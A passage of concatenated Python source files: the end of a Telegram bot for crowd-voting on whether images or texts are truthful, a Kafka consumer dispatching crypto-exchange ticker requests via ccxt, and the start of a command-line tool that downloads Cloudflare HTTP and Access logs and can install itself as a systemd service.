imag_file = io.BytesIO(downloaded_img)
img_hash = get_image_hash(imag_file)
ids, image = process_image_hash(img_hash)
redis.set(name=str(chat_id) + 'ids', value=json.dumps(ids), ex=7200)
redis.set(name=str(chat_id) + 'image', value=str(image.id), ex=7200)
validate_points(message, image, 'image')
@bot_respects_user_language
def process_option_step(message, content_type):
from django.utils.translation import gettext as _
markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(_('Lies'), _('Truth'))
try:
chat_id = message.chat.id
option = message.text
if option in [_("vote"), _(u'cancel')]:
if option == _("vote"):
msg = bot.reply_to(
message,
_(
"choose 'Truth' if you think that the {content_type} is truthful,"
" or choose 'Lies' if you think it's a rumor. 🧐"
).format(content_type=_(content_type)),
reply_markup=markup
)
bot.register_next_step_handler(msg, process_vote, content_type=content_type)
elif option == _('cancel'):
markup = types.ReplyKeyboardRemove(selective=False)
bot.reply_to(message, _('Thank you for using Veridical!'), reply_markup=markup)
bot.clear_step_handler_by_chat_id(chat_id)
else:
raise Exception()
except Exception as e:
bot.reply_to(message, _('oooops, we had an error processing your request.'), reply_markup=markup)
@bot_respects_user_language
def process_vote(message, content_type):
from django.utils.translation import gettext as _
markup = types.ReplyKeyboardRemove(selective=False)
try:
chat_id = message.chat.id
option = message.text
content_id = redis.get(str(chat_id) + content_type)
if content_type == 'image':
model = Image
ids = json.loads(redis.get(str(chat_id) + 'ids'))
elif content_type == 'text':
ids = [content_id.decode()]
model = Text
else:
raise Exception()
content = model.objects.filter(id=content_id.decode()).first()
if option in [_("Truth"), _("Lies")]:
if Review.objects.filter(object_id__in=ids, chat_id=chat_id).exists():
bot.reply_to(
message,
_(
"it seems like you've voted on this {content_type} before,"
" you can only vote on an {content_type} once. 🧐"
).format(content_type=_(content_type)),
reply_markup=markup
)
bot.clear_step_handler_by_chat_id(chat_id)
return
if option == _("Truth"):
content.reviews.create(is_truthful=True, chat_id=chat_id)
model.objects.filter(pk__in=ids).update(truthfulness_points=F('truthfulness_points') + 1)
elif option == _("Lies"):
content.reviews.create(is_truthful=False, chat_id=chat_id)
model.objects.filter(pk__in=ids).update(truthfulness_points=F('truthfulness_points') - 1)
bot.reply_to(
message,
_(
"Thank you for voting on this!"
),
reply_markup=markup
)
bot.clear_step_handler_by_chat_id(chat_id)
else:
raise Exception()
except Exception as e:
bot.reply_to(message, _('oooops, we had an error processing your request.'), reply_markup=markup)
bot.clear_step_handler_by_chat_id(message.chat.id)
def process_request_body(string: str) -> Update:
return bot.process_new_updates([telebot.types.Update.de_json(string)])
if settings.TELEGRAM_BOT_POLLING:
bot.remove_webhook()
time.sleep(0.1)
import threading
threading.Thread(target=bot.polling, kwargs={"none_stop": True}).start()
else:
bot.remove_webhook()
time.sleep(0.1)
bot.set_webhook(url='https://veridical.herokuapp.com/v1/bots/telegram/' + settings.TELEGRAM_BOT_TOKEN)
|
tickerRequestConsumer.py
|
#!/usr/bin/python
import threading
import time
import traceback
import confluent_kafka
import ccxt
import json
import datetime
import logging
import os
import click
import uuid
import signal
import queue
import collections
import etcd3
import simpleProducer
import simpleConsumer
import heartbeatProducer
import configurationService
from ccxtRequestProcessor import CcxtRequestProcessor
logging.basicConfig(
#level=logging.DEBUG,
level=logging.INFO,
format='%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s')
REQUEST_MARKET_DATA_TOPIC = "RequestMarketData"
RESULT_MARKET_DATA_TOPIC = "ResultMarketData"
STATUS_TOPIC = "StatusMarketData"
PROCESSOR_TYPE = "TickerRequestConsumer"
STOP_THREADS = threading.Event()
class RequestListener(object):
def __init__(self, consumer, result_producer, status_producer, id, stop_event,
etcd_host, etcd_port, etcd_root):
self.id = id
self._consumer = consumer
self._result_producer = result_producer
self._status_producer = status_producer
self._stop_event = stop_event
self._thread = threading.Thread(target=self.run)
self._heartbeat = heartbeatProducer.HeatbeatProducer(
status_producer = self._status_producer,
delay = 1, id = self.id,
stop_event = self._stop_event,
processor_type = PROCESSOR_TYPE
)
self._configuration_service = configurationService.EtcdConfigurationService(
etcd_host=etcd_host, etcd_port=etcd_port,
root=etcd_root,
id = self.id,
stop_event = STOP_THREADS,
processor_type = PROCESSOR_TYPE,
leader_election_enabled = False
)
self.processors = {}
def start(self):
logging.info("Start recieving msg from {}".format(
self._consumer.topics))
self._heartbeat.start()
self._configuration_service.start()
self._thread.start()
def run(self):
try:
self._consumer.consume(**{
"stop_event" : self._stop_event,
"callback": self.process_request
})
except Exception as ex:
logging.error("Error processing requests")
logging.error(ex)
logging.debug(traceback.format_exc())
finally:
for processor in self.processors.values():
processor.stop()
for processor in self.processors.values():
processor._thread.join()
def process_request(self, **kwargs):
try:
key = kwargs['key']
request = kwargs['value']
lib = request['lib']
exchange = request['exchange']
processor_key = "{}.{}".format(lib, exchange)
logging.debug("Received msg: {}".format(kwargs))
logging.info("Received msg: {}".format({k:kwargs[k] for k in kwargs if k not in set(['value'])}))
if processor_key in self.processors:
processor = self.processors[processor_key]
else:
if lib == "ccxt":
processor = CcxtRequestProcessor(
producer = self._result_producer,
status_producer = self._status_producer,
configuration_service = self._configuration_service,
listener_id = self.id,
exchange = exchange,
initial_key = key,
initial_request = request
)
self.processors[processor_key] = processor
processor.start()
else:
raise NotImplementedError("Library {} is not supported".format(lib))
processor.put(kwargs)
except Exception as ex:
msg = "Error processing request"
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self.id, request, ex, trace)
def _send_status_error(self, msg, key, request, exception, trace):
try:
if isinstance(key, bytes):
try:
key = uuid.UUID(bytes=key)
except:
key = str(key)
status = {
"id" : key,
"result" : "exception",
"details" : {
"exception" : str(exception),
"type" : str(type(exception)),
"trace" : str(trace),
"request" : request,
"message" : msg
},
"error" : True,
"processor_id" : self.id
}
self._status_producer.send(key=key, value=status)
except Exception as ex:
logging.error("Error sending status")
logging.debug(ex)
logging.debug(traceback.format_exc())
@click.command()
@click.option('-b', '--bootstrap_servers', envvar='BOOTSTRAP_SERVERS', help='Kafka Servers')
@click.option('-o', '--result_topic', envvar='RESULT_TOPIC', default=RESULT_MARKET_DATA_TOPIC, help='Result Topic')
@click.option('-rid', '--request_id', envvar='REQUEST_ID', default=str(uuid.uuid1()), help='Control Id')
@click.option('-s', '--status_topic', envvar='STATUS_TOPIC', default=STATUS_TOPIC, help='Status Topic')
@click.option('-r', '--request_topic', envvar='REQUEST_TOPIC', default=REQUEST_MARKET_DATA_TOPIC, help='Request Topic')
@click.option('-eh', '--etcd_host', envvar='ETCD_HOST', default=configurationService.DEFAULT_HOST, help='etcd host')
@click.option('-ep', '--etcd_port', envvar='ETCD_PORT', default=configurationService.DEFAULT_PORT, help='etcd port')
@click.option('-er', '--etcd_root', envvar='ETCD_ROOT', default=configurationService.DEFAULT_ETCD_ROOT, help='etcd root')
def start_contoller(bootstrap_servers, result_topic, request_id, status_topic, request_topic,
etcd_host, etcd_port, etcd_root):
'''
Consumer for periodic requests.
Listenes to REQUEST_TOPIC for requests on starting and controlling producers.
Producers are sending periodic requests on RESULT_TOPIC topic
'''
REQUEST_MARKET_DATA_CONSUMER = simpleConsumer.Consumer(**{
"subscribe.topics" : [request_topic],
"value.deserializer" : simpleConsumer.value_deserializer,
"bootstrap.servers" : bootstrap_servers,
'group.id': request_id
})
RESULT_MARKET_DATA_PRODUCER = simpleProducer.Producer(**{
"value.serializer" : simpleProducer.value_serializer,
"bootstrap.servers" : bootstrap_servers,
"send.topic" : result_topic
})
STATUS_PRODUCER = simpleProducer.Producer(**{
"value.serializer" : simpleProducer.value_serializer,
"bootstrap.servers" : bootstrap_servers,
"send.topic" : status_topic
})
try:
processor = RequestListener(
consumer=REQUEST_MARKET_DATA_CONSUMER,
result_producer=RESULT_MARKET_DATA_PRODUCER,
status_producer=STATUS_PRODUCER,
id = uuid.uuid1(),
stop_event = STOP_THREADS,
etcd_host=etcd_host,
etcd_port=etcd_port,
etcd_root=etcd_root)
processor.start()
except:
STOP_THREADS.set()
logging.error(traceback.format_exc())
finally:
processor._thread.join()
def exit_gracefully(signum = None, frame = None):
STOP_THREADS.set()
if __name__ == '__main__':
signal.signal(signal.SIGINT, exit_gracefully)
signal.signal(signal.SIGTERM, exit_gracefully)
start_contoller() # pylint: disable=no-value-for-parameter
|
cf_logs_downloader.py
|
#!/usr/bin/env python3
#import libraries needed in this program
#'requests' library needs to be installed first
import requests, time, threading, os, json, logging, sys, argparse, logging.handlers, yaml, yschema, tempfile, signal, persistqueue
from datetime import datetime, timedelta
from pathlib import Path
from shutil import copy2
from gzip import decompress, compress
#specify version number of the program
ver_num = "2.7.2"
#a flag to determine whether the user wants to exit the program, so can handle the program exit gracefully
is_exit = False
#determine how many logpull process are running
num_of_running_thread = 0
#define the timestamp format that we supply to Cloudflare API
timestamp_format = "rfc3339"
#the defaut sampling rate for the logs
sample_rate = 1
#initialize the variables to empty string, so the other parts of the program can access it
log_type = zone_id = account_id = api_token = start_time = end_time = fields = final_fields = log_dest = ""
#the default value for the interval between each logpull process
interval = 60
#set the below settings to default: False
one_time = False
#specify the path to install the systemd service
service_path = '/etc/systemd/system/cf-logs-downloader.service'
'''
Specify the fields for the logs
The following fields are available: BotScore,BotScoreSrc,CacheCacheStatus,CacheResponseBytes,CacheResponseStatus,CacheTieredFill,ClientASN,ClientCountry,ClientDeviceType,ClientIP,ClientIPClass,ClientRequestBytes,ClientRequestHost,ClientRequestMethod,ClientRequestPath,ClientRequestProtocol,ClientRequestReferer,ClientRequestURI,ClientRequestUserAgent,ClientSSLCipher,ClientSSLProtocol,ClientSrcPort,ClientXRequestedWith,EdgeColoCode,EdgeColoID,EdgeEndTimestamp,EdgePathingOp,EdgePathingSrc,EdgePathingStatus,EdgeRateLimitAction,EdgeRateLimitID,EdgeRequestHost,EdgeResponseBytes,EdgeResponseCompressionRatio,EdgeResponseContentType,EdgeResponseStatus,EdgeServerIP,EdgeStartTimestamp,FirewallMatchesActions,FirewallMatchesRuleIDs,FirewallMatchesSources,OriginIP,OriginResponseHTTPExpires,OriginResponseHTTPLastModified,OriginResponseStatus,OriginResponseTime,OriginSSLProtocol,ParentRayID,RayID,RequestHeaders,SecurityLevel,WAFAction,WAFProfile,WAFRuleID,WAFRuleMessage,WorkerCPUTime,WorkerStatus,WorkerSubrequest,WorkerSubrequestCount,ZoneID
Deprecated log fields: OriginResponseBytes,WAFFlags,WAFMatchedVar
'''
http_fields = ["BotScore","BotScoreSrc","CacheCacheStatus","CacheResponseBytes","CacheResponseStatus","CacheTieredFill","ClientASN","ClientCountry","ClientDeviceType","ClientIP","ClientIPClass","ClientRequestBytes","ClientRequestHost","ClientRequestMethod","ClientRequestPath","ClientRequestProtocol","ClientRequestReferer","ClientRequestURI","ClientRequestUserAgent","ClientSSLCipher","ClientSSLProtocol","ClientSrcPort","ClientXRequestedWith","EdgeColoCode","EdgeColoID","EdgeEndTimestamp","EdgePathingOp","EdgePathingSrc","EdgePathingStatus","EdgeRateLimitAction","EdgeRateLimitID","EdgeRequestHost","EdgeResponseBytes","EdgeResponseCompressionRatio","EdgeResponseContentType","EdgeResponseStatus","EdgeServerIP","EdgeStartTimestamp","FirewallMatchesActions","FirewallMatchesRuleIDs","FirewallMatchesSources","OriginIP","OriginResponseHTTPExpires","OriginResponseHTTPLastModified","OriginResponseStatus","OriginResponseTime","OriginSSLProtocol","ParentRayID","RayID","RequestHeaders","SecurityLevel","WAFAction","WAFProfile","WAFRuleID","WAFRuleMessage","WorkerCPUTime","WorkerStatus","WorkerSubrequest","WorkerSubrequestCount","ZoneID"]
access_fields = ["action","allowed","app_domain","app_name","app_type","app_uid","connection","country","created_at","ip_address","purpose_justification_prompt","purpose_justification_response","ray_id","user_email","user_id"]
#create three logging object for logging purposes
logger = logging.getLogger("general_logger") #for general logging
succ_logger = logging.getLogger("succ_logger") #to log successful attempts
fail_logger = logging.getLogger("fail_logger") #to log failed attempts
#the default logging level is INFO, which is one level higher than DEBUG
logger.setLevel(logging.INFO)
succ_logger.setLevel(logging.INFO)
fail_logger.setLevel(logging.INFO)
#create handlers to write logs to local storage, and automatically rotate them
Path("/var/log/cf_logs_downloader/").mkdir(parents=True, exist_ok=True)
handler_file = logging.handlers.TimedRotatingFileHandler("/var/log/cf_logs_downloader/pull.log", when='H', interval=1, backupCount=120, utc=False, encoding="utf-8") #rotate hourly, store up to 120 hours
succ_handler_file = logging.handlers.TimedRotatingFileHandler("/var/log/cf_logs_downloader/succ.log", when='D', interval=1, backupCount=30, utc=False, encoding="utf-8") #rotate daily, store up to 30 days
fail_handler_file = logging.handlers.TimedRotatingFileHandler("/var/log/cf_logs_downloader/fail.log", when='D', interval=1, backupCount=30, utc=False, encoding="utf-8") #rotate daily, store up to 30 days
#create a handler to print logs on terminal
handler_console = logging.StreamHandler()
#define the format of the logs for any logging event occurs
formatter = logging.Formatter("[%(levelname)s] %(message)s") #print log level with message
succfail_formatter = logging.Formatter("%(message)s") #print message only
#set the log format for all the handlers
handler_file.setFormatter(formatter)
handler_console.setFormatter(formatter)
succ_handler_file.setFormatter(succfail_formatter)
fail_handler_file.setFormatter(succfail_formatter)
#finally, add all handlers to their respective loggers
logger.addHandler(handler_console)
succ_logger.addHandler(succ_handler_file)
fail_logger.addHandler(fail_handler_file)
#create a SQLite queue system to handle failed tasks
queue = persistqueue.SQLiteQueue('/var/log/cf_logs_downloader/queue/', auto_commit=True, multithreading=True)
#create a threading event for wait() function
event = threading.Event()
'''
This is the starting point of the program. It will initialize the parameters supplied by the user and save it in a variable.
Help(welcome) message will be displayed if the user specifies -h or --help as the parameter.
If required parameters are not given by the user, an error message will be displayed to the user and the program will exit.
'''
def initialize_arg():
global log_type, zone_id, account_id, api_token, sample_rate, interval, logger, start_time_static, end_time_static, one_time, fields, final_fields, yaml_schema, log_dest
welcome_msg = "A little tool to pull/download HTTP or Cloudflare Access logs from Cloudflare and save it on local storage."
parsed_config = {}
#create an argparse object with the welcome message as the description
parser = argparse.ArgumentParser(description=welcome_msg)
#specify which arguments are available to use in this program. The usage of the arguments will be printed when the user tells the program to display help message.
parser.add_argument("-c", "--config", metavar="config.yml", help="Specify the path to the YAML configuration file.")
parser.add_argument("-a", "--account", metavar="ACCOUNT_ID", help="Specify the Cloudflare Account ID, if CF_ACCOUNT_ID environment variable not set. This will override CF_ACCOUNT_ID variable. Use only with 'access' log type.")
parser.add_argument("-z", "--zone", metavar="ZONE_ID", help="Specify the Cloudflare Zone ID, if CF_ZONE_ID environment variable not set. This will override CF_ZONE_ID variable. Use only with 'http' log type.")
parser.add_argument("-t", "--token", help="Specify your Cloudflare API Token, if CF_TOKEN environment variable not set. This will override CF_TOKEN variable.")
parser.add_argument("-r", "--rate", help="Specify the log sampling rate from 0.01 to 1. Default is 1. Only applicable for 'http' log type.", type=float)
parser.add_argument("-i", "--interval", help="Specify the interval between each logpull in seconds. Default is 60 seconds.", type=int)
parser.add_argument("-n", "--nice", help="Specify the niceness of the logpull process from -20 (highest priority) to 19 (lowest priority). Default is -10.", type=int)
parser.add_argument("--type", help="Specify the type of logs that you would like to pull. Possible values: http (for HTTP logs), access (for Cloudflare Access logs)")
parser.add_argument("--path", metavar="/log/path/", help="Specify the path to store logs. By default, it will save to /var/log/cf_logs/.")
parser.add_argument("--prefix", help="Specify the prefix name of the logfile being stored on local storage. By default, the file name will begins with cf_logs.")
parser.add_argument("--no-organize", help="Instruct the program to store raw logs as is, without organizing them into date and time folder.", action="store_true")
parser.add_argument("--no-gzip", help="Do not compress the raw logs.", action="store_true")
parser.add_argument("--one-time", help="Only pull logs from Cloudflare for one time, without scheduling capability. You must specify the start time and end time of the logs to be pulled from Cloudflare.", action="store_true")
parser.add_argument("--start-time", help="Specify the start time of the logs to be pulled from Cloudflare. The start time is inclusive. You must follow the ISO 8601 (RFC 3339) date format, in UTC timezone. Example: 2020-12-31T12:34:56Z")
parser.add_argument("--end-time", help="Specify the end time of the logs to be pulled from Cloudflare. The end time is exclusive. You must follow the ISO 8601 (RFC 3339) date format, in UTC timezone. Example: 2020-12-31T12:35:00Z")
parser.add_argument("--exclude", metavar="field1,field2", help="Specify the list of log fields to be excluded from Logpull. Separate each field by comma without spaces. Only applicable for 'http' log type.")
parser.add_argument("--available-fields", metavar="TYPE", help="Specify the log type to display the list of available log fields used by the program. These fields are also included in the logpull by default (unless field exclusion is configured). Possible values: http | access.")
parser.add_argument("--install-service", help="Install the program as a systemd service. The service will execute the program from the path where you install the service.", action="store_true")
parser.add_argument("--uninstall-service", help="Uninstall the systemd service.", action="store_true")
parser.add_argument("--list-queue", help="List all the pending tasks in the queue which has failed before, without beautifying the result (raw JSON).", action="store_true")
parser.add_argument("--list-queue-beauty", help="List all the pending tasks in the queue which has failed before, with beautifying the result.", action="store_true")
parser.add_argument("--queue-size", help="Display the number of pending tasks in the queue which has failed before.", action="store_true")
parser.add_argument("--debug", help="Enable debugging functionality.", action="store_true")
parser.add_argument("-v", "--version", help="Show program version.", action="version", version="Version " + ver_num)
#parse the parameters supplied by the user, and check whether the parameters match the one specified above
#if it does not match, an error message will be given to the user and the program will exit
args = parser.parse_args()
one_time = args.one_time
#only allow writing activity logs to disk when the user does not use one time operation.
if one_time is False:
logger.addHandler(handler_file)
#if user specifies this parameter, list the queue as it is without any beautification and sorting
if args.list_queue:
print(json.dumps(queue.queue(), default=str))
sys.exit(0)
#if user specifies this parameter, list the queue with beautification and sorting based on log_start_time_utc
if args.list_queue_beauty:
print(json.dumps(sorted(queue.queue(), key=sort_json_by_log_start_time_utc), default=str, indent=2))
sys.exit(0)
#if user specifies this parameter, display the current size of the queue (how many items in the queue)
if args.queue_size:
print(str(queue.size))
sys.exit(0)
#catch someone who tries to "install and uninstall" service, which is definitely not logic.
if args.install_service and args.uninstall_service:
logger.critical(str(datetime.now()) + " --- Hold on. Are you trying to install or uninstall service?")
sys.exit(2)
#attempt to install service as requested by the user
if args.install_service:
#the user can also specify the location of the existing config file so that the config file can be copied directly to /etc/cf-logs-downloader/.
config_path = args.config if args.config else False
install_service(config_path)
#attempt to uninstall service as requested by the user
if args.uninstall_service:
uninstall_service()
#return the list of available fields by joining each field together as a string with ',' as delimiter
if args.available_fields:
if args.available_fields == 'http':
print(','.join(field for field in http_fields))
sys.exit(0)
elif args.available_fields == 'access':
print(','.join(field for field in access_fields))
sys.exit(0)
else:
logger.critical(str(datetime.now()) + " --- No log fields for log type '" + log_type + "'. Valid values: http | access")
sys.exit(2)
#check if user specifies the path to configuration file, if yes, attempt read settings from the configuration file
if args.config:
#check if configuration file exists. if not, display an error and exit.
try:
config_file = open(args.config, mode="r", encoding="utf-8")
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error while opening " + args.config + ": " + str(e) + ".")
sys.exit(2)
#if able to open the configuration file, load and parse the YAML data into Python dictionary.
#if unable to parse the YAML data, display an error and exit.
try:
parsed_config = yaml.safe_load(config_file)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error parsing configuration file: " + str(e))
sys.exit(2)
finally:
config_file.close()
#retrieve the YAML schema from the schema file
yaml_schema = get_yaml_schema()
#check if the configuration follows the schema. If not, display an error and exit.
try:
yschema.validate(parsed_config, yaml_schema)
except yschema.exceptions.ValidationError as e:
logger.critical(str(datetime.now()) + " --- Error in configuration file: " + str(e) + ". Please check whether the settings are correct.")
sys.exit(2)
#enable debugging if specified by the user
if args.debug is True or parsed_config.get("debug") is True:
logger.setLevel(logging.DEBUG)
#check whether the log type is specified by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading log type: arguments - environment variable - config file.
#if no log type is specified, an error message will be given to the user and the program will exit
if args.type:
log_type = args.type
elif os.getenv("CF_LOG_TYPE"):
log_type = os.getenv("CF_LOG_TYPE")
elif parsed_config.get("type"):
log_type = parsed_config.get("type")
else:
logger.critical(str(datetime.now()) + " --- Please specify the type of logs you want to pull. Possible values: http | access")
sys.exit(2)
#check either zone ID or account ID based on the log type the user specified. HTTP logs only require zone ID, while Cloudflare Access logs only require account ID.
if log_type == "http":
#immediately assign the http fields list to a new variable, future reference of log fields will be the new variable
fields = http_fields
#check whether Zone ID is given by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading Zone ID: arguments - environment variable - config file.
#if no Zone ID is given, an error message will be given to the user and the program will exit
if args.zone:
zone_id = args.zone
elif os.getenv("CF_ZONE_ID"):
zone_id = os.getenv("CF_ZONE_ID")
elif parsed_config.get("cf_zone_id"):
zone_id = parsed_config.get("cf_zone_id")
else:
logger.critical(str(datetime.now()) + " --- Please specify your Cloudflare Zone ID.")
sys.exit(2)
#check if user provides the sample rate value in command line as argument, if not, check the config file.
#if not exist in config file, use the default value.
#priority of reading : arguments - config file - default value (1).
if args.rate:
sample_rate = args.rate
elif parsed_config.get("rate"):
sample_rate = parsed_config.get("rate")
#check whether the sample rate is valid, if not return an error message and exit
try:
#the value should not more than two decimal places
if len(str(sample_rate).split(".", 1)[1]) > 2:
logger.critical(str(datetime.now()) + " --- Invalid sample rate specified. Please specify a value between 0.01 and 1, and only two decimal places allowed.")
sys.exit(2)
except IndexError:
#sometimes the user may specify 1 as the value, so we need to handle the exception for value with no decimal places
pass
if sample_rate <= 1.0 and sample_rate >= 0.01:
sample_rate = str(sample_rate)
else:
logger.critical(str(datetime.now()) + " --- Invalid sample rate specified. Please specify a value between 0.01 and 1, and only two decimal places allowed.")
sys.exit(2)
elif log_type == "access":
#immediately assign the Access fields list to a new variable, future reference of log fields will be the new variable
fields = access_fields
#check whether Account ID is given by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading Account ID: arguments - environment variable - config file.
#if no Account ID is given, an error message will be given to the user and the program will exit
if args.account:
account_id = args.account
elif os.getenv("CF_ACCOUNT_ID"):
account_id = os.getenv("CF_ACCOUNT_ID")
elif parsed_config.get("cf_account_id"):
account_id = parsed_config.get("cf_account_id")
else:
logger.critical(str(datetime.now()) + " --- Please specify your Cloudflare Account ID.")
sys.exit(2)
#display a warning to the user if the user specifies sample rate while using Cloudflare Access log type.
if args.rate or parsed_config.get("rate"):
logger.warning(str(datetime.now()) + " --- Cloudflare Access log does not support sampling. Sample rate will be ignored.")
else:
logger.critical(str(datetime.now()) + " --- Invalid log type '" + log_type + "'. Valid values: http | access")
sys.exit(2)
#check whether Cloudflare API Token is given by the user via the parameter. If not, check the environment variable.
#if not in environment variable, then check the config file.
#priority of reading Cloudflare API Token: arguments - environment variable - config file.
#if no Cloudflare API Token is given, an error message will be given to the user and the program will exit
if args.token:
api_token = args.token
elif os.getenv("CF_TOKEN"):
api_token = os.getenv("CF_TOKEN")
elif parsed_config.get("cf_token"):
api_token = parsed_config.get("cf_token")
else:
logger.critical(str(datetime.now()) + " --- Please specify your Cloudflare API Token.")
sys.exit(2)
#if the user wants to do one-time operation, check the correctness of the start time and end time of the logs to pull.
if one_time is True:
if args.start_time and args.end_time:
try:
start_time_static = datetime.strptime(args.start_time, "%Y-%m-%dT%H:%M:%SZ")
end_time_static = datetime.strptime(args.end_time, "%Y-%m-%dT%H:%M:%SZ")
diff_start_end = end_time_static - start_time_static
diff_to_now = datetime.utcnow() - end_time_static
if diff_start_end.total_seconds() < 1:
logger.critical(str(datetime.now()) + " --- Start time must be earlier than the end time by at least 1 second. ")
sys.exit(2)
if log_type == "http":
if diff_to_now.total_seconds() < 60:
logger.critical(str(datetime.now()) + " --- Please specify an end time that is 60 seconds or more earlier than the current time.")
sys.exit(2)
elif log_type == "access":
if diff_to_now.total_seconds() < 1:
logger.critical(str(datetime.now()) + " --- Please specify an end time that is 1 second or more earlier than the current time.")
sys.exit(2)
except ValueError:
logger.critical(str(datetime.now()) + " --- Invalid date format specified. Make sure it is in RFC 3339 date format, in UTC timezone. Please refer to the example: 2020-12-31T12:34:56Z")
sys.exit(2)
else:
logger.critical(str(datetime.now()) + " --- No start time or end time specified for one-time operation. ")
sys.exit(2)
#check if user specifies interval in the command line as parameter. If not, check the config file. Else, use the default value.
#priority of reading interval value: arguments - config file - default value (60).
if args.interval:
interval = args.interval
elif parsed_config.get("interval"):
interval = parsed_config.get("interval")
#check if user specifies niceness in the command line as parameter. If not, check the config file. Else, use the default value.
#priority of reading interval value: arguments - config file - default value (-10).
#niceness value must be between -20 to 19.
try:
if args.nice:
if args.nice < -20 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too small. Setting the value to -20.")
os.nice(-20)
elif args.nice > 19 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too large. Setting the value to 19.")
os.nice(19)
else:
os.nice(args.nice)
elif parsed_config.get("nice"):
if parsed_config.get("nice") < -20 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too small. Setting the value to -20.")
os.nice(-20)
elif parsed_config.get("nice") > 19 :
logger.warning(str(datetime.now()) + " --- The value of niceness is too large. Setting the value to 19.")
os.nice(19)
else:
os.nice(parsed_config.get("nice"))
else:
os.nice(-10)
except Exception as e:
logger.warning(str(datetime.now()) + " --- Unable to set niceness value of the logpull process: " + str(e) + ".")
#check if the user specifies log path and logfile prefix in command line arguments. If yes, override everything specified in the config file.
if args.path or args.prefix:
log_dest = [{'name': 'default', 'path': args.path if args.path else '/var/log/cf_logs/', 'prefix': args.prefix if args.prefix else 'cf_logs', 'no_organize': False, 'no_gzip': False}]
#else if there's log destination configuration in config file, then get the value fron it
elif parsed_config.get("log_dest"):
log_dest = parsed_config.get("log_dest")
#else, use the default value
else:
log_dest = [{'name': 'default', 'path': '/var/log/cf_logs/', 'prefix': 'cf_logs', 'no_organize': False, 'no_gzip': False}]
#if the user specifies True either as command line arguments or inside config file, then we assume the user wants to turn on the option.
for i in range(len(log_dest)):
log_dest[i]['no_organize'] = True if args.no_organize is True else log_dest[i].get('no_organize')
log_dest[i]['no_gzip'] = True if args.no_gzip is True else log_dest[i].get('no_gzip')
#only perform field exclusion on HTTP log type
if log_type == "http":
#exclude certain fields in logpull
if args.exclude:
list_exclude_field = "".join(args.exclude.split()) #remove all whitespaces
list_exclude_field = list_exclude_field.split(',') #
for exclude_field in list_exclude_field:
fields.remove(exclude_field)
elif parsed_config.get('fields.exclude'):
for exclude_field in parsed_config.get('fields.exclude'):
fields.remove(exclude_field)
final_fields = ','.join(field for field in fields)
elif log_type == "access":
if args.exclude or parsed_config.get('fields.exclude'):
logger.warning(str(datetime.now()) + " --- Cloudflare Access log does not support exclusion of log fields. All fields will be included in the log. Field exclusion will be ignored. Specify '--available-fields access' parameter to view the list of Cloudflare Access log fields.")
'''
This method is to retrieve the YAML schema from the schema file (schema.yml), and return the value of the schema to the caller.
'''
def get_yaml_schema():
try:
yaml_schema_file = open('schema.yml', mode='r', encoding='utf-8')
yaml_schema = yaml.safe_load(yaml_schema_file)
yaml_schema_file.close()
return yaml_schema
except FileNotFoundError:
logger.critical(str(datetime.now()) + " --- Unable to parse YAML schema: schema.yml file not found. Clone the repository from Github, or download the release file and try again.")
sys.exit(2)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Unable to parse YAML schema: " + str(e) + ". Clone the repository from Github, or download the release file and try again.")
sys.exit(2)
'''
This method sorts the incoming JSON object (task queue) by log_start_time_utc.
'''
def sort_json_by_log_start_time_utc(value):
return value["data"]["log_start_time_utc"]
'''
This method will install the tool as a systemd service.
'''
def install_service(config_path):
service_desc = '''\
[Unit]
Description=A little tool to pull/download HTTP or Cloudflare Access logs from Cloudflare and save it on local storage.
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=root
ExecStart={cwd}/cf_logs_downloader.py --config {config_file}
[Install]
WantedBy=multi-user.target\
'''.format(cwd=os.getcwd(), config_file=config_path)
try:
#try write the service file
service_file = open(service_path, mode='w', encoding="utf-8")
service_file.write(service_desc)
service_file.close()
#reload the systemd after adding new service
os.system("systemctl daemon-reload")
#check if the user specifies the config file path. If yes, copy the config file and paste it into /etc/cf-logs-downloader/.
if config_path:
logger.info(str(datetime.now()) + " --- Successfully installed service as " + service_path + ".")
try:
copy2(config_path, '/etc/cf-logs-downloader/config.yml')
logger.info(str(datetime.now()) + " --- Successfully copied the config file to /etc/cf-logs-downloader/config.yml.")
except IOError as io_err:
os.makedirs(os.path.dirname('/etc/cf-logs-downloader/'))
copy2(config_path, '/etc/cf-logs-downloader/config.yml')
logger.info(str(datetime.now()) + " --- Successfully copied the config file to /etc/cf-logs-downloader/config.yml.")
else:
logger.info(str(datetime.now()) + " --- Successfully installed service as " + service_path + ". Ensure that the config file is located in /etc/cf-logs-downloader/config.yml before you start the service.")
logger.info(str(datetime.now()) + " --- Enable the service by using this command: systemctl enable cf-logs-downloader")
logger.info(str(datetime.now()) + " --- Start the service by using this command: systemctl start cf-logs-downloader")
sys.exit(0)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error while installing service as " + service_path + ":" + str(e) + ".")
sys.exit(126)
'''
This method will uninstall the systemd service.
'''
def uninstall_service():
if os.path.exists(service_path):
try:
#disable the service first before deleting the service.
os.system("systemctl disable cf-logs-downloader")
os.remove(service_path)
#reload the systemd service after deleting the service.
os.system("systemctl daemon-reload")
logger.info(str(datetime.now()) + " --- Successfully uninstalled the service.")
sys.exit(0)
except Exception as e:
logger.critical(str(datetime.now()) + " --- Error while uninstalling service:" + str(e) + ". You may remove the service manually by deleting " + service_path + ".")
sys.exit(126)
else:
logger.critical(str(datetime.now()) + " --- The service was not installed previously. Abort.")
sys.exit(126)
'''
This method will be invoked after initialize_arg().
This method is to verify whether the Cloudflare Zone ID/Account ID (depending on the log type) and Cloudflare API Token given by the user is valid.
If it is not valid, an error message will be given to the user and the program will exit
'''
def verify_credential():
global logger
if log_type == "http":
#specify the Cloudflare API URL to check the Zone ID and API Token
